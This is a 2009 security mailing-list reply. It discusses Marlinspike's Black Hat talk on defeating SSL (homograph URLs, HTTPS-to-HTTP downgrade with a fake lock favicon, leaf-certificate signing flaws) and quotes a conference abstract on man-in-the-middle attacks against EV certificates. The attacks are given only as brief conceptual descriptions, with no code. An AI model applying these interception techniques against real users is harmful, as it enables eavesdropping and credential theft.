Re: SSL MITM fun.

[Dragos Ruiu <dr () kyx net>]

On 19-Feb-09, at 10:04 AM, Dan Moniz wrote:

> On Thu, Feb 19, 2009 at 12:07 PM, Dave Aitel <dave () immunityinc com>  
> wrote:
>
> > This is a good presentation.
> >
> > https://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf
> >
> > Essentially he details 3 attacks (from what I can tell):
> > 1. Register a .cn address and use unicode character for / and ? to
> > have HTTPS://www.paypal.com/?domain.cn?<some args> validate
>
> Unless I'm missing something, this is essentially what Eric Johanson
> said in 2005 about IDN:
> http://www.shmoo.com/idn/homograph.txt
>
> > 2. Force user to stay on HTTP by MITM proxy that does modifications  
> > to
> > the data as it goes through. Send HTTPS to the server, and HTTP to  
> > the
> > client. Use a Lock icon as your Faveicon to fool the user they are
> > "secure" even though they see HTTP:// instead o HTTPS://
> >
> > 3. Sign the leaf cert with your leaf cert. This abuses an
> > implementation flaw in OpenSSL, etc.
>
> If you can sit between endpoints, modify traffic, and you control one
> of the eventual endpoints anyway, and only you're jumping through all
> these hoops to maintain the illusion for the unsuspecting user, why
> not just take control of DNS and *actually* MITM SSL?


/me points to Sotirov's et al upcoming presentation in March.

I know our editor will be putting up the edited talk descriptions  
shortly, but
an earlier version of the abstract was:

Description:

Extended Validation (EV) SSL certificates have been touted by  
Certificate
Authorities and browser vendors as a solution to the poor validation  
standards
for issuing traditional SSL certificates. It was previously thought  
that EV
certificates are not affected by attacks that allow malicious hackers  
to obtain
a non-EV SSL certificate, such as the MD5 collision attack or the widely
publicized failures of some CAs to validate domain ownership before  
issuing
certificates.

Unfortunately, it turns out that the security offered by EV  
certificates is not
any better than the security of even the cheapest $12 SSL certificate.  
In this
talk we will show how any attacker who can obtain a non-EV SSL  
certificate for
a website can perform completely transparent man-in-the-middle attacks  
on any
SSL connection to that site, even if the website is protected is by an  
EV
certificate and the users are diligently inspecting all information  
contained
in the SSL certificates.

cheers,
--dr

--
World Security Pros. Cutting Edge Training, Tools, and Techniques
Vancouver, Canada  March 16-20 2009  http://cansecwest.com
London, U.K. May 27/28 2009 http://eusecwest.com
pgpkey http://dragos.com/ kyxpgp

_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave